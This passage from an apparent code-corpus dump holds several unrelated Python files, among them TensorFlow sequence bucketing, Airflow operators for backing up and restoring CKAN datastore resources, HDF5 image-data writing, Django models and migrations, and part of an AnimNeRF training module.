If set, the queues will be shared under the given\n name across multiple sessions.\n name: (Optional) A name for the operations.\n\n Returns:\n A tuple `(sequence_length, outputs)` where `sequence_length` is\n a 1-D `Tensor` of size `batch_size` and `outputs` is a list or dictionary\n of batched, bucketed, outputs corresponding to elements of `tensors`.\n\n Raises:\n TypeError: if `bucket_boundaries` is not a list of python integers.\n ValueError: if `bucket_boundaries` is empty or contains non-increasing\n values or if batch_size is a list and it's length doesn't equal the number\n of buckets.\n \"\"\"\n tensor_list = _as_tensor_list(tensors)\n if not isinstance(bucket_boundaries, (list, tuple)):\n raise TypeError(\n \"bucket_boundaries must be a list or tuple, but received: %s\" %\n bucket_boundaries)\n if not bucket_boundaries:\n raise ValueError(\"bucket_boundaries must not be empty\")\n for (s, e) in zip(bucket_boundaries[:-1], bucket_boundaries[1:]):\n if not isinstance(s, int) or not isinstance(e, int):\n raise TypeError(\"bucket boundaries must be integers, but saw: %s and %s\" %\n (s, e))\n if s >= e:\n raise ValueError(\n \"Buckets must contain sequential increasing lengths, but saw: \"\n \"%d before %d\" % (s, e))\n\n with ops.name_scope(name, \"bucket_by_sequence_length\",\n [input_length] + tensor_list) as name:\n input_length = ops.convert_to_tensor(\n input_length, dtype=dtypes.int32, name=\"input_length\")\n # Bucketing conditions are:\n # l < b[0]\n # b[0] <= l < b[1]\n # b[1] <= l < b[2]\n # ...\n # b[N-2] <= l < b[N-1]\n # b[N-1] <= l\n # Equivalent to:\n # [-inf, b[0], b[1], ..., b[N-1]] <= l < [b[0], b[1], ..., b[N-1], inf]\n buckets_min = [np.iinfo(np.int32).min] + list(bucket_boundaries)\n buckets_max = list(bucket_boundaries) + [np.iinfo(np.int32).max]\n conditions_c = math_ops.logical_and(\n math_ops.less_equal(buckets_min, input_length),\n math_ops.less(input_length, buckets_max))\n which_bucket = math_ops.reduce_min(array_ops.where(conditions_c))\n which_bucket = math_ops.to_int32(which_bucket)\n\n if shapes is not None:\n shapes = [tensor_shape.scalar()] + shapes\n\n _, dequeued = bucket(\n tensors=[input_length] + tensor_list,\n which_bucket=which_bucket,\n batch_size=batch_size,\n num_buckets=len(bucket_boundaries) + 1,\n num_threads=num_threads,\n capacity=capacity,\n shapes=shapes,\n dynamic_pad=dynamic_pad,\n allow_smaller_final_batch=allow_smaller_final_batch,\n keep_input=keep_input,\n shared_name=shared_name)\n\n return (dequeued[0], _as_original_type(tensors, dequeued[1:]))\n\n\n__all__ = [\"bucket\", \"bucket_by_sequence_length\"]\n"} {"ext": "py", "sha": "1a2ed23e5ff49379e6935d99a53b1dd765e63b5c", "content": "import hashlib\nimport json\nimport logging\nfrom pathlib import Path\nfrom typing import List\n\nimport ckanapi\nimport pandas as pd\nfrom airflow.models.baseoperator import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\n\nclass BackupDatastoreResourceOperator(BaseOperator):\n \"\"\"\n Reads datastore resource, creates backup files for fields (json) and records (parquet). Args:\n - address: CKAN instance URL\n - apikey: CKAN API key\n - resource_task_id: task_id that returns resource object (ie. 
GetOrCreateResourcePackage)\n - dir_task_id: task_id that returns backup directory\n\n\n Returns dictionary containing:\n - fields: json file path containing fields for datastore resource\n - data: parquet file path containing fields for datastore resource\n - columns: number of columns in datastore resource\n - rows: number of rows in datastore_resource\n - resource_id: datastore resource ID\n \"\"\"\n\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n resource_task_id: str,\n dir_task_id: str,\n sort_columns: List[str] = [],\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.dir_task_id = dir_task_id\n self.resource_task_id = resource_task_id\n self.sort_columns = sort_columns\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def _checksum_datastore_response(self, datastore_response):\n data = pd.DataFrame(datastore_response[\"records\"])\n if \"_id\" in data.columns.values:\n data = data.drop(\"_id\", axis=1)\n if len(self.sort_columns) > 0:\n data = data.sort_values(by=self.sort_columns)\n\n data_hash = hashlib.md5()\n data_hash.update(data.to_csv(index=False).encode(\"utf-8\"))\n\n return data_hash.hexdigest()\n\n def _build_dataframe(self, records):\n data = pd.DataFrame(records)\n if \"_id\" in data.columns.values:\n data = data.drop(\"_id\", axis=1)\n\n return data\n\n def _save_fields_json(self, datastore_response, checksum, backups_dir):\n fields_file_path = backups_dir / f\"fields.{checksum}.json\"\n\n if not fields_file_path.exists():\n fields = [f for f in datastore_response[\"fields\"] if f[\"id\"] != \"_id\"]\n with open(fields_file_path, \"w\") as f:\n json.dump(fields, f)\n\n return fields_file_path\n\n def _save_data_parquet(self, datastore_response, checksum, backups_dir, data):\n data_file_path = backups_dir / f\"data.{checksum}.parquet\"\n\n if not data_file_path.exists():\n data.to_parquet(path=data_file_path, engine=\"fastparquet\", compression=None)\n\n return data_file_path\n\n def execute(self, context):\n # get a resource and backup directory via xcom\n ti = context[\"ti\"]\n resource = ti.xcom_pull(task_ids=self.resource_task_id)\n backups_dir = Path(ti.xcom_pull(task_ids=self.dir_task_id))\n\n # get number of records for this datastore resource\n record_count = self.ckan.action.datastore_search(id=resource[\"id\"], limit=0)[\n \"total\"\n ]\n\n # get data from datastore resource\n datastore_response = self.ckan.action.datastore_search(\n id=resource[\"id\"], limit=record_count\n )\n\n # turn data into dataframe\n data = self._build_dataframe(datastore_response[\"records\"])\n checksum = self._checksum_datastore_response(datastore_response)\n\n # return filepath for fields json, data parquet, row/col counts, checksum, and resource_id\n result = {\n \"fields_file_path\": self._save_fields_json(\n datastore_response, checksum, backups_dir\n ),\n \"data_file_path\": self._save_data_parquet(\n datastore_response, checksum, backups_dir, data\n ),\n \"records\": data.shape[0],\n \"columns\": data.shape[1],\n \"resource_id\": datastore_response[\"resource_id\"],\n \"checksum\": checksum,\n }\n\n logging.info(f\"Returning: {result}\")\n\n return result\n\n\n\nclass DeleteDatastoreResourceOperator(BaseOperator):\n \"\"\"\n Deletes a datastore resource\n Inputs:\n - address: CKAN instance URL\n - apikey: CKAN API key\n - resource_id: CKAN resource id to be deleted\n\n Resource id can be given with n actual value, or with a reference to a task_id and task_key that returns the value\n \n Note: Deleting the entire resource 
also deletes the data dictionary (i.e. schema, field definitions and types). \n To keep the existing schema, delete the datastore resource records instead by using the DeleteDatastoreResourceRecordsOperator - this keeps the schema.\n \"\"\"\n\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n resource_id: str = None,\n resource_id_task_id: str = None,\n resource_id_task_key: str = None,\n **kwargs,\n ) -> None:\n # init ckan client and resource_id to be truncated\n super().__init__(**kwargs)\n self.resource_id, self.resource_id_task_id, self.resource_id_task_key = resource_id, resource_id_task_id, resource_id_task_key\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n\n def execute(self, context):\n # get task instance from context\n ti = context['ti']\n\n # get resource id from task, if task info provided in input\n if self.resource_id_task_id and self.resource_id_task_key:\n self.resource_id = ti.xcom_pull(task_ids=self.resource_id_task_id)[self.resource_id_task_key]\n self.resource = ti.xcom_pull(task_ids=self.resource_id_task_id)\n logging.info(self.resource)\n logging.info(\"Pulled {} from {} via xcom\".format(self.resource_id, self.resource_id_task_id) )\n\n assert self.resource_id, \"Resource ID is empty! This operator needs a way to get the resource ID in order to delete the right datastore resource!\"\n # Delete the resource\n try:\n self.ckan.action.datastore_delete(id=self.resource_id, force=True)\n logging.info(\"Deleted \" + self.resource_id)\n\n except Exception as e:\n logging.error(\"Error while trying to delete resource: \" + e)\n\n\n\nclass DeleteDatastoreResourceRecordsOperator(BaseOperator):\n \"\"\"\n Deletes datastore resource records. Args:\n - address: CKAN instance URL\n - apikey: CKAN API key\n - backup_task_id: task_id that returns backup file information (BackupDatastoreResourceOperator)\n \"\"\"\n\n @apply_defaults\n def __init__(\n self, address: str, apikey: str, backup_task_id: str, **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.backup_task_id = backup_task_id\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def execute(self, context):\n backups_info = context[\"ti\"].xcom_pull(task_ids=self.backup_task_id)\n\n self.ckan.action.datastore_delete(id=backups_info[\"resource_id\"], force=True)\n\n with open(Path(backups_info[\"fields_file_path\"]), \"r\") as f:\n fields = json.load(f)\n\n self.ckan.action.datastore_create(id=backups_info[\"resource_id\"], fields=fields, force=True)\n\n record_count = self.ckan.action.datastore_search(\n id=backups_info[\"resource_id\"], limit=0\n )[\"total\"]\n\n assert record_count == 0, f\"Resource not empty after cleanup: {record_count}\"\n\n\nclass InsertDatastoreResourceRecordsOperator(BaseOperator):\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n resource_task_id: str,\n parquet_filepath_task_id: str = None,\n fields_json_path_task_id: str = None,\n chunk_size: int = 20000,\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.parquet_filepath_task_id = parquet_filepath_task_id\n self.resource_task_id = resource_task_id\n self.chunk_size = chunk_size\n self.fields_json_path_task_id = fields_json_path_task_id\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def _create_empty_resource_with_fields(self, fields_path, resource_id):\n with open(fields_path, \"r\") as f:\n fields = json.load(f)\n\n self.ckan.action.datastore_create(id=resource_id, fields=fields, force=True)\n\n def execute(self, 
context):\n ti = context[\"ti\"]\n resource = ti.xcom_pull(task_ids=self.resource_task_id)\n\n if self.fields_json_path_task_id is not None:\n fields_path = Path(ti.xcom_pull(task_ids=self.fields_json_path_task_id))\n self._create_empty_resource_with_fields(fields_path, resource[\"id\"])\n\n if self.parquet_filepath_task_id is not None:\n path = Path(ti.xcom_pull(task_ids=self.parquet_filepath_task_id))\n\n data = pd.read_parquet(path)\n records = data.to_dict(orient=\"records\")\n\n chunks = [\n records[i : i + self.chunk_size]\n for i in range(0, len(records), self.chunk_size)\n ]\n\n for chunk in chunks:\n clean_records = []\n logging.info(f\"Removing NaNs and inserting {len(records)} records\")\n for r in chunk:\n record = {}\n for key, value in r.items():\n if value == value:\n record[key] = value\n clean_records.append(record)\n\n self.ckan.action.datastore_create(\n id=resource[\"id\"], records=clean_records, force=True\n )\n\n logging.info(f\"Records inserted: {data.shape[0]}\")\n\n return data.shape[0]\n\n\nclass RestoreDatastoreResourceBackupOperator(BaseOperator):\n @apply_defaults\n def __init__(\n self, address: str, apikey: str, backup_task_id: str, **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.backup_task_id = backup_task_id\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n def execute(self, context):\n backups_info = context[\"ti\"].xcom_pull(task_ids=self.backup_task_id)\n\n assert backups_info is not None, \"No backup information\"\n\n resource_id = backups_info[\"resource_id\"]\n\n with open(Path(backups_info[\"fields_file_path\"]), \"r\") as f:\n fields = json.load(f)\n\n data = pd.read_parquet(Path(backups_info[\"data_file_path\"]))\n records = data.to_dict(orient=\"records\")\n\n try:\n self.ckan.action.datastore_delete(id=resource_id)\n except Exception as e:\n logging.error(e)\n\n result = self.ckan.action.datastore_create(\n id=resource_id, fields=fields, records=records\n )\n\n logging.info(f\"Result: {result}\")\n\n return result\n\n\n\nclass InsertDatastoreResourceRecordsFromJSONOperator(BaseOperator):\n '''\n Reads a JSON file and write the output into a CKAN datastore resource.\n JSON must be a list of dicts, with each dict being a record, like the following:\n [\n { \"column1\": \"string\", \"column2\": 100, \"column3\": true},\n { \"column1\": \"some other string\", \"column2\": 34, \"column3\": false}\n ]\n\n The fields must match the CKAN standard, like the following:\n [\n {\n \"id\": \"column1\", \n \"type\": \"text\" ,\n \"info\": {\n \"notes\": \"Description of the field goes here. 
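# --- Hedged example -------------------------------------------------------
# A small sketch of the two patterns used in
# InsertDatastoreResourceRecordsOperator.execute above: slicing a record
# list into fixed-size chunks, and dropping NaN values with the
# "value == value" test (NaN is the only value not equal to itself).
# The records and chunk size here are hypothetical.
import math


def chunk_records(records, chunk_size):
    return [records[i:i + chunk_size] for i in range(0, len(records), chunk_size)]


def drop_nans(record):
    # keep only keys whose value is not NaN
    return {k: v for k, v in record.items() if v == v}


if __name__ == "__main__":
    records = [{"a": 1, "b": math.nan}, {"a": 2, "b": 3.0}, {"a": 4, "b": 5.0}]
    for chunk in chunk_records(records, chunk_size=2):
        print([drop_nans(r) for r in chunk])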
Info key is optional.\"\n }\n },\n {\n \"id\": \"column2\", \n \"type\": \"int\"\n },\n {\n \"id\": \"column3\", \n \"type\": \"bool\"\n }\n ]\n \n Expects as inputs:\n - address - url of target ckan\n - apikey - key needed to make authorized ckan calls\n - resource_id - id of the resource that will receive this data\n - data_path - location of the json data file\n - fields_path - location of the data's fields, already in a CKAN-friendly format\n\n All of the above, except the address and apikey, can be given with an actual value, or with a reference to a task_id and task_key that returns the value\n '''\n @apply_defaults\n def __init__(\n self,\n address: str,\n apikey: str,\n\n resource_id: str = None,\n resource_id_task_id: str = None,\n resource_id_task_key: str = None,\n\n data_path: str = None,\n data_path_task_id: str = None,\n data_path_task_key: str = None,\n\n fields_path: str = None,\n fields_path_task_id: str = None,\n fields_path_task_key: str = None,\n\n **kwargs,\n ) -> None:\n super().__init__(**kwargs)\n self.resource_id, self.resource_id_task_id, self.resource_id_task_key = resource_id, resource_id_task_id, resource_id_task_key\n self.data_path, self.data_path_task_id, self.data_path_task_key = data_path, data_path_task_id, data_path_task_key\n self.fields_path, self.fields_path_task_id, self.fields_path_task_key = fields_path, fields_path_task_id, fields_path_task_key\n self.ckan = ckanapi.RemoteCKAN(apikey=apikey, address=address)\n\n\n def execute(self, context):\n # init task instance from context\n ti = context['ti']\n\n # assign important vars if provided from other tasks\n if self.resource_id_task_id and self.resource_id_task_key:\n self.resource_id = ti.xcom_pull(task_ids=self.resource_id_task_id)[self.resource_id_task_key]\n\n if self.data_path_task_id and self.data_path_task_key:\n self.data_path = ti.xcom_pull(task_ids=self.data_path_task_id)[self.data_path_task_key]\n\n if self.fields_path_task_id and self.fields_path_task_key:\n self.fields_path = ti.xcom_pull(task_ids=self.fields_path_task_id)[self.fields_path_task_key]\n\n\n # get fields from file\n with open(self.fields_path, \"r\") as f:\n fields = json.load(f)\n logging.info(\"Loaded the following fields from {}: {}\".format( self.fields_path, fields ))\n\n # populate that resource w data from the path provided\n assert self.data_path, \"Data path, or the filepath to the data to be inserted, must be provided!\"\n with open(self.data_path) as f:\n data = json.load(f)\n \n logging.info(\"Data parsed from JSON file\")\n logging.info(\"Fields from fields file: \" + str(fields))\n logging.info(\"Fields from data file: \" + str(data[0].keys()))\n\n self.ckan.action.datastore_create(id=self.resource_id, fields=fields, records=data)\n logging.info(\"Resource created and populated from input fields and data\")\n\n return {\"resource_id\": self.resource_id, \"data_inserted\": len(data)}\n\n "} {"ext": "py", "sha": "1a2ed2604bd803aec2ca1994ff502f014e0ffc81", "content": "import os\nimport torch\n\nfrom utils.runs import Run\nfrom utils.utils import print_message, save_checkpoint\nfrom parameters import SAVED_CHECKPOINTS\n\n\ndef print_progress(scores):\n positive_avg, negative_avg = round(scores[:, 0].mean().item(), 2), round(scores[:, 1].mean().item(), 2)\n print(\"#>>> \", positive_avg, negative_avg, '\\t\\t|\\t\\t', positive_avg - negative_avg)\n\n\ndef manage_checkpoints(args, colbert, optimizer, batch_idx):\n arguments = args.input_arguments.__dict__\n\n path = os.path.join(Run.path, 'checkpoints')\n\n if not 
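# --- Hedged example -------------------------------------------------------
# A standalone sketch of the sanity check implied by the logging in
# InsertDatastoreResourceRecordsFromJSONOperator: confirm that every column
# present in the JSON records is declared in the CKAN-style fields list
# before calling datastore_create. Field names and values are hypothetical.
def undeclared_columns(fields, records):
    declared = {f["id"] for f in fields}
    seen = set()
    for record in records:
        seen.update(record.keys())
    return sorted(seen - declared)


if __name__ == "__main__":
    fields = [{"id": "column1", "type": "text"}, {"id": "column2", "type": "int"}]
    records = [{"column1": "a", "column2": 1}, {"column1": "b", "column3": True}]
    print(undeclared_columns(fields, records))  # ['column3'] -> schema mismatch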
os.path.exists(path):\n os.mkdir(path)\n\n if batch_idx % 2000 == 0:\n name = os.path.join(path, \"colbert.dnn\")\n save_checkpoint(name, 0, batch_idx, colbert, optimizer, arguments)\n\n if batch_idx in SAVED_CHECKPOINTS:\n name = os.path.join(path, \"colbert-{}.dnn\".format(batch_idx))\n save_checkpoint(name, 0, batch_idx, colbert, optimizer, arguments)\n"} {"ext": "py", "sha": "1a2ed37fea8e4429bfb60b85d8d46565ef016023", "content": "from dataclasses import dataclass\nfrom bindings.gmd.operation_method_property_type import OperationMethodPropertyType\n\n__NAMESPACE__ = \"http://www.opengis.net/gml\"\n\n\n@dataclass\nclass OperationMethodRef(OperationMethodPropertyType):\n class Meta:\n name = \"operationMethodRef\"\n namespace = \"http://www.opengis.net/gml\"\n"} {"ext": "py", "sha": "1a2ed38f590f29ace6484c9226f88b9f4ac5951b", "content": "import os\n\nimport numpy as np\nimport tables\nimport os\n\nfrom .normalize import normalize_data_storage, reslice_image_set\n\n\ndef create_data_file(out_file, n_channels, n_samples, n_truth_labels, image_shape):\n \"\"\" Initializes the hdf5 file and gives pointers for its three arrays\n \"\"\"\n try:\n os.makedirs(os.path.dirname(out_file))\n except:\n pass\n\n hdf5_file = tables.open_file(out_file, mode='w')\n filters = tables.Filters(complevel=5, complib='blosc')\n data_shape = tuple([0, n_channels] + list(image_shape))\n truth_shape = tuple([0, n_truth_labels] + list(image_shape))\n\n data_storage = hdf5_file.create_earray(hdf5_file.root, 'data', tables.Float32Atom(), shape=data_shape,\n filters=filters, expectedrows=n_samples)\n truth_storage = hdf5_file.create_earray(hdf5_file.root, 'truth', tables.UInt8Atom(), shape=truth_shape,\n filters=filters, expectedrows=n_samples)\n affine_storage = hdf5_file.create_earray(hdf5_file.root, 'affine', tables.Float32Atom(), shape=(0, 4, 4),\n filters=filters, expectedrows=n_samples)\n return hdf5_file, data_storage, truth_storage, affine_storage\n\n\ndef write_image_data_to_file(image_files, data_storage, truth_storage, image_shape, n_channels, affine_storage,\n truth_dtype=np.uint8, crop=True):\n for set_of_files in image_files: # set_of_files is both the volume file and the label file\n images = reslice_image_set(set_of_files, image_shape, label_indices=len(set_of_files) - 1,\n crop=crop) # both volume and label is resliced\n subject_data = [image.get_data() for image in images]\n add_data_to_storage(data_storage, truth_storage, affine_storage, subject_data, images[0].affine, n_channels,\n truth_dtype)\n return data_storage, truth_storage\n\n\ndef add_data_to_storage(data_storage, truth_storage, affine_storage, subject_data, affine, n_channels, truth_dtype):\n data_storage.append(np.asarray(subject_data[:n_channels])[\n np.newaxis]) # Anything but the last element of subject_data must be volume data\n\n # split_truth_into_binary_labels(subject_data[n_channels])\n # what_to_append = split_truth_into_binary_labels(subject_data[n_channels], truth_dtype, truth_labels)[np.newaxis]\n # truth_storage.append(what_to_append)\n truth_storage.append(np.asarray(subject_data[n_channels], dtype=truth_dtype)[np.newaxis][\n np.newaxis]) # the last element of subject_data must be the labels\n affine_storage.append(np.asarray(affine)[np.newaxis])\n\n\ndef write_data_to_file(training_data_files, out_file, image_shape, truth_dtype=np.uint8, subject_ids=None,\n normalize=True, crop=True):\n \"\"\"\n Takes in a set of training images and writes those images to an hdf5 file.\n :param training_data_files: List of tuples containing 
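# --- Hedged example -------------------------------------------------------
# A minimal sketch of the PyTables pattern used by create_data_file above:
# open an HDF5 file, create an extendable EArray with a leading dimension of
# zero, and append one sample at a time. The file name, channel count, and
# image shape below are hypothetical.
import numpy as np
import tables


def demo_earray(out_file="demo.h5", n_channels=2, image_shape=(4, 4, 4)):
    filters = tables.Filters(complevel=5, complib="blosc")
    with tables.open_file(out_file, mode="w") as h5:
        data = h5.create_earray(
            h5.root,
            "data",
            tables.Float32Atom(),
            shape=(0, n_channels) + image_shape,
            filters=filters,
            expectedrows=10,
        )
        sample = np.zeros((n_channels,) + image_shape, dtype=np.float32)
        data.append(sample[np.newaxis])  # the leading axis grows with each append
        return data.shape  # -> (1, 2, 4, 4, 4)


if __name__ == "__main__":
    print(demo_earray())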
the training data files. The modalities should be listed in\n the same order in each tuple. The last item in each tuple must be the labeled image. \n Example: [('sub1-T1.nii.gz', 'sub1-T2.nii.gz', 'sub1-truth.nii.gz'), \n ('sub2-T1.nii.gz', 'sub2-T2.nii.gz', 'sub2-truth.nii.gz')]\n :param out_file: Where the hdf5 file will be written to.\n :param image_shape: Shape of the images that will be saved to the hdf5 file.\n :param truth_dtype: Default is 8-bit unsigned integer. \n :return: Location of the hdf5 file with the image data written to it. \n \"\"\"\n n_samples = len(training_data_files)\n n_channels = len(training_data_files[0]) - 1\n n_truth_labels = 1\n\n try:\n hdf5_file, data_storage, truth_storage, affine_storage = create_data_file(out_file,\n n_channels=n_channels,\n n_samples=n_samples,\n n_truth_labels=n_truth_labels,\n image_shape=image_shape)\n except Exception as e:\n # If something goes wrong, delete the incomplete data file\n os.remove(out_file)\n raise e\n\n write_image_data_to_file(training_data_files, data_storage, truth_storage, image_shape, truth_dtype=truth_dtype,\n n_channels=n_channels, affine_storage=affine_storage, crop=crop)\n if subject_ids:\n hdf5_file.create_earray(hdf5_file.root, 'subject_ids', obj=subject_ids)\n if normalize:\n normalize_data_storage(data_storage)\n hdf5_file.close()\n return out_file\n\n\ndef open_data_file(filename, readwrite=\"r\"):\n return tables.open_file(filename, readwrite)\n"} {"ext": "py", "sha": "1a2ed3af00dd0272577cc60cc2b72f17f5efad1f", "content": "\n# -*- coding: utf-8 -*-\n\nfrom django.db import models\nfrom django.utils.encoding import python_2_unicode_compatible\nfrom parler.models import TranslatableModel, TranslatedFields\n\n\nclass TimeStampedModel(models.Model):\n created_at = models.DateTimeField(auto_now_add=True)\n modified_at = models.DateTimeField(auto_now=True)\n\n class Meta:\n abstract = True\n\n\n@python_2_unicode_compatible\nclass AuthenticationSource(TimeStampedModel, TranslatableModel):\n \"\"\"MPASS authentication sources.\"\"\"\n auth_id = models.CharField(max_length=128)\n icon_url = models.CharField(max_length=2048, blank=True, null=True)\n tags = models.ManyToManyField('AuthenticationTag', blank=True)\n translations = TranslatedFields(\n title=models.CharField(max_length=2048)\n )\n\n @property\n def shib_auth_selection_parameter(self):\n return 'authnContextClassRef=urn:mpass.id:authnsource:%s' % self.auth_id\n\n def __str__(self):\n return self.auth_id\n\n\n@python_2_unicode_compatible\nclass AuthenticationTag(TimeStampedModel, TranslatableModel):\n \"\"\"MPASS authentication tags used for grouping AuthenticationSources.\"\"\"\n tag_id = models.CharField(max_length=128)\n translations = TranslatedFields(\n title=models.CharField(max_length=2048)\n )\n\n @property\n def shib_auth_selection_parameter(self):\n return 'authnContextClassRef=urn:mpass.id:authntag:%s' % self.auth_id\n\n def __str__(self):\n return self.tag_id\n\n\n@python_2_unicode_compatible\nclass Service(TimeStampedModel, TranslatableModel):\n \"\"\"MPASS Service.\"\"\"\n service_id = models.CharField(max_length=128)\n icon_url = models.CharField(max_length=2048, blank=True, null=True)\n service_url = models.CharField(max_length=2048, blank=True, null=True)\n sso_url = models.CharField(max_length=2048, blank=True, null=True)\n translations = TranslatedFields(\n description=models.CharField(max_length=2048),\n title=models.CharField(max_length=2048)\n )\n\n def __str__(self):\n return self.service_id\n\n# vim: tabstop=2 expandtab 
shiftwidth=2 softtabstop=2\n\n"} {"ext": "py", "sha": "1a2ed3bf39547120ff86d95576269db1453f8e77", "content": "# Generated by Django 2.1.3 on 2018-11-23 05:47\n\nfrom django.conf import settings\nfrom django.db import migrations, models\nimport django.db.models.deletion\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n migrations.swappable_dependency(settings.AUTH_USER_MODEL),\n ('multiplicity', '0008_datasettypestructure_icon'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Photo',\n fields=[\n ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),\n ('created_at', models.DateTimeField(auto_now_add=True)),\n ('updated_at', models.DateTimeField(auto_now=True)),\n ('image', models.ImageField(blank=True, null=True, upload_to='photos')),\n ('author', models.CharField(max_length=255)),\n ('source_url', models.CharField(blank=True, max_length=255, null=True)),\n ('description', models.TextField(blank=True, null=True)),\n ('deleted', models.BooleanField(db_index=True, default=False)),\n ('space', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='multiplicity.ReferenceSpace')),\n ('uploaded_by', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),\n ],\n options={\n 'ordering': ['-created_at', '-updated_at'],\n 'abstract': False,\n },\n ),\n ]\n"} {"ext": "py", "sha": "1a2ed4161d2439401a69c931198a039dbc93f74f", "content": "import os\nimport time\nfrom collections import defaultdict\nimport torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom torchvision.utils import save_image\n\nfrom config import get_cfg\n# models\nfrom models.volume_rendering import VolumeRenderer\nfrom models.anim_nerf import AnimNeRF\nfrom models.body_model_params import BodyModelParams\n# losses\n# datasets\nfrom datasets import dataset_dict\n# optimizer, scheduler, visualization\nfrom utils import *\nfrom utils.util import load_pickle_file\n\n\n# pytorch-lightning\nfrom torchmetrics.functional import psnr, ssim\nfrom pytorch_lightning.callbacks import ModelCheckpoint\nfrom pytorch_lightning import LightningDataModule, LightningModule, Trainer\nfrom pytorch_lightning.loggers import TensorBoardLogger\n\n\nclass AnimNeRFData(LightningDataModule):\n def __init__(self, hparams):\n super(AnimNeRFData, self).__init__()\n # self.hparams = hparams\n self.save_hyperparameters(hparams)\n \n def setup(self, stage=None):\n dataset = dataset_dict[self.hparams.dataset_name]\n\n if self.hparams.deformation_dim + self.hparams.apperance_dim > 0 or self.hparams.optim_body_params:\n frame_ids_index = {}\n for i, frame_id in enumerate(self.hparams.frame_IDs):\n frame_ids_index[frame_id] = i\n else:\n frame_ids_index = None\n \n kwargs = {'root_dir': self.hparams.root_dir,\n 'img_wh': tuple(self.hparams.img_wh),\n 'frame_start_ID': self.hparams.train.frame_start_ID,\n 'frame_end_ID': self.hparams.train.frame_end_ID,\n 'frame_skip': self.hparams.train.frame_skip,\n 'subsampletype': self.hparams.train.subsampletype,\n 'subsamplesize': self.hparams.train.subsamplesize,\n 'model_type': self.hparams.model_type,\n 'cam_IDs': self.hparams.train.cam_IDs\n }\n self.train_dataset = dataset(mode='train', frame_ids_index=frame_ids_index, **kwargs)\n\n kwargs = {'root_dir': self.hparams.root_dir,\n 'img_wh': tuple(self.hparams.img_wh),\n 'frame_start_ID': self.hparams.val.frame_start_ID,\n 'frame_end_ID': self.hparams.val.frame_end_ID,\n 'frame_skip': 
self.hparams.val.frame_skip,\n 'model_type': self.hparams.model_type,\n 'cam_IDs': self.hparams.val.cam_IDs\n }\n self.val_dataset = dataset(mode='val', frame_ids_index=frame_ids_index, **kwargs)\n\n kwargs = {'root_dir': self.hparams.root_dir,\n 'img_wh': tuple(self.hparams.img_wh),\n 'frame_start_ID': self.hparams.test.frame_start_ID,\n 'frame_end_ID': self.hparams.test.frame_end_ID,\n 'frame_skip': self.hparams.test.frame_skip,\n 'model_type': self.hparams.model_type,\n 'cam_IDs': self.hparams.test.cam_IDs\n }\n self.test_dataset = dataset(mode='val', frame_ids_index=frame_ids_index, **kwargs)\n \n def train_dataloader(self):\n return DataLoader(self.train_dataset,\n shuffle=True,\n num_workers=self.hparams.train.num_workers,\n batch_size=self.hparams.train.batch_size,\n pin_memory=False)\n\n def val_dataloader(self):\n return DataLoader(self.val_dataset,\n shuffle=False,\n num_workers=self.hparams.val.num_workers,\n batch_size=self.hparams.val.batch_size, # validate one image (H*W rays) at a time\n pin_memory=False)\n \n def test_dataloader(self):\n return DataLoader(self.test_dataset,\n shuffle=False,\n num_workers=self.hparams.test.num_workers,\n batch_size=self.hparams.test.batch_size, # validate one image (H*W rays) at a time\n pin_memory=False)\n\nclass AnimNeRFSystem(LightningModule):\n def __init__(self, hparams):\n super(AnimNeRFSystem, self).__init__()\n # self.hparams = hparams\n self.save_hyperparameters(hparams)\n\n self.anim_nerf = AnimNeRF(\n model_path=self.hparams.model_path,\n model_type=self.hparams.model_type,\n gender=self.hparams.gender,\n freqs_xyz=self.hparams.freqs_xyz,\n freqs_dir=self.hparams.freqs_dir,\n use_view=self.hparams.use_view,\n k_neigh=self.hparams.k_neigh,\n use_knn=self.hparams.use_knn,\n use_unpose=self.hparams.use_unpose,\n unpose_view=self.hparams.unpose_view,\n use_deformation=self.hparams.use_deformation,\n pose_dim=self.hparams.pose_dim,\n deformation_dim=self.hparams.deformation_dim,\n apperance_dim=self.hparams.apperance_dim,\n use_fine=self.hparams.n_importance>0 or self.hparams.n_depth>0,\n share_fine=self.hparams.share_fine,\n dis_threshold=self.hparams.dis_threshold,\n query_inside=self.hparams.query_inside,\n )\n\n self.models = [self.anim_nerf]\n\n if self.hparams.deformation_dim > 0 or self.hparams.apperance_dim > 0:\n self.hparams.latent_dim = self.hparams.deformation_dim + self.hparams.apperance_dim\n self.latent_codes = nn.Embedding(self.hparams.num_frames, self.hparams.latent_dim)\n self.latent_codes.weight.data.normal_(0, 0.1)\n self.models += [self.latent_codes]\n\n self.body_model_params = BodyModelParams(self.hparams.num_frames, model_type=self.hparams.model_type)\n self.load_body_model_params()\n if self.hparams.optim_body_params:\n optim_params = self.body_model_params.param_names\n for param_name in optim_params:\n self.body_model_params.set_requires_grad(param_name, requires_grad=True)\n self.models += [self.body_model_params]\n\n self.volume_renderer = VolumeRenderer(n_coarse=self.hparams.n_samples, n_fine=self.hparams.n_importance, n_fine_depth=self.hparams.n_depth, share_fine=self.hparams.share_fine, white_bkgd=self.hparams.white_bkgd)\n\n def load_body_model_params(self):\n body_model_params = {param_name: [] for param_name in self.body_model_params.param_names}\n body_model_params_dir = os.path.join(self.hparams.root_dir, '{}s'.format(self.hparams.model_type))\n \n for frame_id in self.hparams.frame_IDs:\n params = load_pickle_file(os.path.join(body_model_params_dir, 